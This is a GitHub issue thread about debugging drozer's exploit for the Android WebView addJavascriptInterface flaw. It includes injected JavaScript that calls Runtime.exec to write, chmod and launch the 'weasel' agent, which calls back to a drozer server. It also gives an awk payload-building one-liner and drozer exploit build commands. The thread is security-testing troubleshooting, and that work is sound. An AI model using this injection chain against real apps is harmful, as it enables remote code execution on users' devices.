Drozer Shell Injection, Octal Escaping and /system/bin/ash

[joswr1ght]

In the "WebView addJavascriptInterface Remote Code Execution" article, there is a great introduction to drozer payload injecting using the addJavaScriptInterface flaw. However, I think the payload delivery method is broken on Android devices running /system/bin/ash.

The article recommends this line for creating a payload to inject through malicious JavaScript:

$ drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}

Which will give you a one liner:

execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);

However, it does not appear that the /system/bin/sh (which is ash) appropriately accommodates octal escaping in this manner:

# /system/bin/sh -c echo -e "\0177\0105\0114\0106\0001\0001" >f
# ls -l f
-rw-rw-rw- root     root            1 2013-10-12 23:06 f

It looks like ash does not preserve the input data, leaving us with a 1 byte file (expected 6 bytes). Not to be discriminatory, ash doesn't preserve the input data for hex escaping either:

# /system/bin/sh -c echo -e "\x41\x41\x41\x41" >f
# ls -l f
-rw-rw-rw- root     root            1 2013-10-12 23:12 f

I'm testing this on an Android API15 emulator. Any thoughts on getting escaped binary content delivered to Android devices for Weasel deployment reliably?

Thanks,

-Josh

[metall0id]

I am not sure I understand what you mean. Do you mean that some devices do not have /system/bin/sh and so the current weasel stager will fail?

[joswr1ght]

No, AFAIK, all Android devices have /system/bin/sh, which is a symlink to /system/bin/ash. The ash binary doesn't properly preserve the escaped octal content, preventing us from encoding and delivering the Weasel binary in the described method.

Maybe you can let us know what Android release you used for your demonstration with weasel? I can see if there are any changes between that and other versions of ash.

Thanks,

-Josh

[metall0id]

I have tested this on emulators and predominantly Samsung devices that I own. Devices that I can recall where I know it works 100% are:

• ICS emulator
• Galaxy Tab - running 2.2
• Galaxy S2 - running 2.3
• Galaxy S3 - running 4.1.2
• Galaxy S4 - running latest
• HTC Legend - running 2.1

Which devices are you seeing this on?

If I run ash on a linux box - I see that it includes the -e in the output (which it needs when using sh), as follows:

$ echo -e "\0101"
-e A

Is this what you are seeing?

[joswr1ght]

Ah, frag. I was screwing this up all along:

# /system/bin/sh -c "echo -e '\0177\0105\0114\0106\0001\0001' >f"
# ls -l f
----rwxr-x system   sdcard_rw        7 2013-10-13 00:02 f

The arguments passed to "sh -c" need to be in quotes.

I suck. Sorry about that.

Do you think you could post your whole working drozer.js script, with the escaped Weasel code? I have command injection working just fine, but keep getting messed up on getting the escaped code right.

Thanks!

-Josh

[metall0id]

No problem :) Really glad that this does work universally - I really tried to test the method thoroughly.

I don't have my MWR laptop with me at the moment. Will be able to get back to you about that escaped weasel code tomorrow (Sunday) night. We are going through testing stages for the full-on MiTM exploit module for drozer that works on every app that is vulnerable to this issue.

There is some pretty neat stuff in there that you may be interested in

Tyrone

[joswr1ght]

I'd love to see that. Great work on :1,$s/Mercury/Drozer/g. I'm surprised more media outlets haven't caught on to Drozer and this addJSInterface issue. -Josh

[joswr1ght]

Any word on getting that complete drozer.js posted? Thanks! -Josh

[metall0id]

Hi,

Sorry for the delayed reply. I have put it here for you: https://www.dropbox.com/s/x4zdgj9j0k0uvxm/dz.js.zip

Please note that this is the output generated by the drozer exploit that we are releasing soon :)

You will have to change the IP address that weasel calls back to (which should be the IP of your drozer server)

[metall0id]

Please let me know once you have downloaded this so that I can remove this file.

Did it work for you? :)

[joswr1ght]

I grabbed it, thank you! I'll try it tomorrow, but it looks awesome. Nice job automatically enumerating the JS interface! -Josh

[metall0id]

Hi,

drozer.js is now implemented in https://github.com/mwrlabs/drozer/blob/master/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py - go check it out.

If I am not mistaken, "weasel.shell.armeabi" (infact, every drozer payload) is basically designed to work with ARM architecture

You are correct. drozer does not have payloads for anything other than ARM

[shivang1989]

hey Tyrone,

Thank you for clearing my doubt regarding ARM. I appreciate it.

Regards
-Shiv

[tersark]

Im trying to deploy a weasel in an android emulator. I'm using windows and therefore i'm not executing fully this command

drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'} 

However I should get the conexion to drozer server with the following injected code isnt it?

    var host = '10.0.2.2';
    var port = '31415';
    var path = '/data/data/com.vuln.app/files/weasel';
    function execute(cmd){
      return window.interface.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/rm',path]);
    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    execute(['/system/bin/chmod','770',path]);
    execute([path,host,port]);

What I'm doing wrong?

[metall0id]

I am struggling to understand your question. Lets take a step back and explain the following to me:

• What module you are running?
• Why are you trying to build the payload manually?
• Are you exploiting the Android browser or another application with a JS interface?

[tersark]

Sorry for my bad expression.
Im trying to follow this article https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/

The thing is that I'm using Windows and I cannot execute this command:

drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'} 

But the thing is that this comand is to build the weasel therefore is not needed to make the mobile device to the drozer server.

I'm working with an emulator and I am injecting the following JavaScript code into an app. In theory the emulator should connect to the drozer server even if the weasel was not build isnt it?

    var host = '10.0.2.2';
    var port = '31415';
    var path = '/data/data/com.vuln.app/files/weasel';
    function execute(cmd){
      return window.interface.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/rm',path]);
    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    execute(['/system/bin/chmod','770',path]);
    execute([path,host,port]);

[metall0id]

execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
This line is where the output of that weasel command goes. The "...." part cannot work as is

Please see the following module that is already in drozer that exploits this issue: https://github.com/mwrlabs/drozer/blob/master/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py

This exploit is slightly more up-to-date than that article as well

[tersark]

Sorry about last comment, afterwards i realized this. However I used a virtual machine to build the payload but is not working either :(. I've tried to generate again the payload using $drozer payload build weasel.shell.armeabi >weasel and then change the IP in weasel file to 10.0.2.2 (cause i will run it in an emulator). I pushed in the device and leaving only this code

var host = '10.0.2.2';
var port = '31415';
var path = '/data/data/com.example.vulnerableapp/files/weasel';
execute(['/system/bin/chmod','770',path]);
document.write(window.jsinterface.getSomeString()); //no arriba aqui
execute([path,host,port]);

but doesn't work either...

the code you passed me is the code of drozer application right? IDK how to use it :(

thanks for all the help

[metall0id]

You do not need to manually change the IP address, you can you the --server 10.0.2.2 flag when building weasel.

The code I linked in my last code is already in drozer. To use it do:

drozer exploit build exploit.remote.mitm.addjavascriptinterface --server 10.0.2.2 --payload weasel.shell.armeabi

[joswr1ght]

As a silent lurker on this thread, let me say that you are awesome Tyrone!

-Josh

Sent from my iPhone

On Apr 14, 2014, at 5:51 PM, Tyrone Erasmus notifications@github.com wrote:

You do not need to manually change the IP address, you can you the --server 10.0.2.2 flag when building weasel.

The code I linked in my last code is already in drozer. To use it do:

drozer exploit build exploit.remote.mitm.addjavascriptinterface --server 10.0.2.2 --payload weasel.shell.armeabi
—
Reply to this email directly or view it on GitHub.

[tersark]

I'm sorry for not getting this, but this command is for attacking an app right? all im getting is: Uploading weasel to /weasel and W...timed out

Ive tried to build again the payload using the server flag like this

drozer payload build  --server 10.0.2.2 weasel.shell.armeabi > weasel

Then i've pushed the file to the right path inside the device and trying to execute it with

execute([path]);

However im getting "error calling npobject"

I know I should inject the weasel code in the javascript but ive done this to try at least if the code executes something inside the device.

I have to this because the following line is not creating a file in the device:

execute(['/system/bin/sh','-c','echo -e \"\0177...\0000\" > '+path]);

Sorry for all the inconvenience and thank you very much for all your effort!

[tersark]

Hello again!

I've been doing some experiments trying to make this work for me. Its weird but, as I said in the previous post, the following line is not generating any file:

execute(['/system/bin/sh','-c','echo -e "\0177...\0000" > '+path]);

However, i just take the first characters like in the following line, the files is created just fine.

execute(['/system/bin/sh','-c','echo -e "\0177\0105\0114\0106" > '+path]);

Any Ideas on what could be happening?

Thankyou very much!

[metall0id]

Thank you @joswr1ght :)

@tersark: If you can get it to write any content to a file then the exploit is working correctly. As for the weasel code not being written out - that is a mystery to me. Try break up the problem: for instance, do adb shell and try to perform the exact command. Get the exact weasel output that is used in the exploit by doing:

drozer payload build weasel.shell.armeabi --server 10.0.2.2

More than debugging this one line at a time I am not sure what else to do without being able to replicate this problem on your specific device.

EDIT: You may want to use --working-directory /data/local/tmp when testing it from adb

[tersark]

HI, I've tried to copy line by line, but the weasel line is to big for the command buffer (I imagine, because i can't paste the whole line) so i've pushed the a file with code created by drozer.
This is what I'm getting:

root@android:/data/local/tmp # ./weas.adb
./weas.adb
: No such file or directorycal/tmp
./weas.adb[5]: ./w: not found
: not found6]:
127|root@android:/data/local/tmp #

the thing is that now in the directory appears a file named w but seems invisible to commands such as rm or just trying to execute the file. although its there and it has the right permisions

127|root@android:/data/local/tmp # ls -l
ls -l
-rwxrwx--- root     root        21841 2014-04-16 17:03 w
-rwxrwxrwx root     root       109301 2014-04-16 16:48 weas.adb
root@android:/data/local/tmp # ./w 10.0.2.2 31415
./w 10.0.2.2 31415
/system/bin/sh: ./w: not found
127|root@android:/data/local/tmp # rm ./w
rm ./w
rm failed for ./w, No such file or directory

very weird :S

[metall0id]

This is very unusual behaviour - maybe try on a different phone or emulator? :) You do not need root on the device that you will be testing on

[tersark]

ive tried in a different emulator, the file is created but when i try to execute it with the adb shell this is what I get ( fragment)

./weasel[180]: 0∟2♫5└Ç0└Ç0☺2▲0☻0☻2∟2♫3└Ç0└Ç0♥2└Ç5└Ç0¶0∟1: not found
./weasel[181]: 1└Ç0└Ç0↔2▬2└Ç0: not found
0▼7▼7↔3►0☻0☻0∟2☺4♠0‼5∟5☼7└Ç0└Ç0∟2▲6▼7▼7♥2►17►3∟2☻0└Ç4►3∟0└Ç0¶0◄5∟5☺4└Ç0◄5∟5└Ç5└Ç0¶0∟1↓1▼7▼7↔2▬3└Ç0: not found
./weasel[183]: 0∟3└Ç7└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♂2▼7▼7↔3└Ç1☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1☻7└Ç0└Ç0↔2▼4♠0└Ç0∟2▬4└Ç0: not found
./weasel[184]: 3∟3└Ç0└Ç0└Ç2└Ç0└Ç4☻2└Ç1♦0►4└Ç2└Ç1♦0►4☻2└Ç5└Ç0¶0└Ç1└Ç2☻0¶0└Ç3└Ç1♦7►2└Ç3└Ç5└Ç0¶0☻1└Ç1☻0¶0☻3└Ç2♦7►2☻3♥7└Ç0└Ç0↔2↑0└Ç0: not found
./weasel[185]: 3∟3♠1└Ç0└Ç0♥2↑6└Ç0: not found
./weasel[186]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1▼7▼7↔3└Ç3☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç2♦6►3∟1☻2└Ç0└Ç0↔2↑7└Ç0: not found
./weasel[187]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♠6▼7▼7↔3└Ç0♦0: not found
./weasel[188]: 0∟2♣4└Ç0└Ç0☺2▲0♠0☻2∟2♣2└Ç0└Ç0♥2└Ç5└Ç0¶0∟1└Ç4☻0¶0∟3♦4└Ç0└Ç0↔2▼0♠0└Ç0∟2↑0└Ç0: not found
./weasel[189]: 3∟3└Ç6└Ç0└Ç0♥2☺0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç3☻0¶0∟3☺2♣0►2∟3└Ç1♠0¶0∟1♥2└Ç0└Ç0↔2↓0└Ç0: not found
./weasel[190]: 0∟3└Ç4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♦1▼7▼7↔3▲0♦0└Ç0∟2☻0♦0►2∟2└Ç4└Ç0└Ç0↔2↓1└Ç0: not found
./weasel[191]: 0∟3☻4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♥2▼7▼7↔3▲0♦0└Ç0∟2☺7♠0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦6►3∟1└Ç7└Ç0└Ç0↔2▼0♠0└Ç0∟2→0└Ç0: not found
./weasel[192]: 3∟3☺0└Ç0└Ç0♥2└Ç0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦7►2∟3└Ç5♠0¶0∟33▼5▼7↔3└Ç0└Ç0: not found
./weasel[193]: 0∟3♦3▼7▼7☺2☺1└Ç0¶0∟3☻0→0◄5∟2▲0►7↨5↔0♥0♣5↔1: not found
./weasel[194]: 0∟3▼7☼7▬0§3☺0►0▼4∟3▼7☼7§3└Ç7▬1►00∟4▼7☼7♀4☺1└Ç0└Ç04↔3▼7☼7└Ç1└Ç0└Ç0└Ç0: not found

Could be possible to contact you in a live chat??

Thank you very much for everything!

[joswr1ght]

Is this emulator target ARM or x86/Atom? If you download the file to a Linux box, what does "file weasel" say?

-Josh

Sent from my iPhone

On Apr 18, 2014, at 11:49 AM, tersark notifications@github.com wrote:

ive tried in a different emulator, the file is created but when i try to execute it with the adb shell this is what I get ( fragment)

./weasel[180]: 0∟2♫5└Ç0└Ç0☺2▲0☻0☻2∟2♫3└Ç0└Ç0♥2└Ç5└Ç0¶0∟1: not found
./weasel[181]: 1└Ç0└Ç0↔2▬2└Ç0: not found
0▼7▼7↔3►0☻0☻0∟2☺4♠0‼5∟5☼7└Ç0└Ç0∟2▲6▼7▼7♥2►17►3∟2☻0└Ç4►3∟0└Ç0¶0◄5∟5☺4└Ç0◄5∟5└Ç5└Ç0¶0∟1↓1▼7▼7↔2▬3└Ç0: not found
./weasel[183]: 0∟3└Ç7└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♂2▼7▼7↔3└Ç1☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1☻7└Ç0└Ç0↔2▼4♠0└Ç0∟2▬4└Ç0: not found
./weasel[184]: 3∟3└Ç0└Ç0└Ç2└Ç0└Ç4☻2└Ç1♦0►4└Ç2└Ç1♦0►4☻2└Ç5└Ç0¶0└Ç1└Ç2☻0¶0└Ç3└Ç1♦7►2└Ç3└Ç5└Ç0¶0☻1└Ç1☻0¶0☻3└Ç2♦7►2☻3♥7└Ç0└Ç0↔2↑0└Ç0: not found
./weasel[185]: 3∟3♠1└Ç0└Ç0♥2↑6└Ç0: not found
./weasel[186]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1▼7▼7↔3└Ç3☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç2♦6►3∟1☻2└Ç0└Ç0↔2↑7└Ç0: not found
./weasel[187]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♠6▼7▼7↔3└Ç0♦0: not found
./weasel[188]: 0∟2♣4└Ç0└Ç0☺2▲0♠0☻2∟2♣2└Ç0└Ç0♥2└Ç5└Ç0¶0∟1└Ç4☻0¶0∟3♦4└Ç0└Ç0↔2▼0♠0└Ç0∟2↑0└Ç0: not found
./weasel[189]: 3∟3└Ç6└Ç0└Ç0♥2☺0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç3☻0¶0∟3☺2♣0►2∟3└Ç1♠0¶0∟1♥2└Ç0└Ç0↔2↓0└Ç0: not found
./weasel[190]: 0∟3└Ç4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♦1▼7▼7↔3▲0♦0└Ç0∟2☻0♦0►2∟2└Ç4└Ç0└Ç0↔2↓1└Ç0: not found
./weasel[191]: 0∟3☻4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♥2▼7▼7↔3▲0♦0└Ç0∟2☺7♠0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦6►3∟1└Ç7└Ç0└Ç0↔2▼0♠0└Ç0∟2→0└Ç0: not found
./weasel[192]: 3∟3☺0└Ç0└Ç0♥2└Ç0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦7►2∟3└Ç5♠0¶0∟33▼5▼7↔3└Ç0└Ç0: not found
./weasel[193]: 0∟3♦3▼7▼7☺2☺1└Ç0¶0∟3☻0→0◄5∟2▲0►7↨5↔0♥0♣5↔1: not found
./weasel[194]: 0∟3▼7☼7▬0§3☺0►0▼4∟3▼7☼7§3└Ç7▬1►00∟4▼7☼7♀4☺1└Ç0└Ç04↔3▼7☼7└Ç1└Ç0└Ç0└Ç0: not found
—
Reply to this email directly or view it on GitHub.

[tersark]

The emulator is and ARM. I've pulled the file and try that command in a linux environment. The result is:

./weaselAndroid: data

Thanks!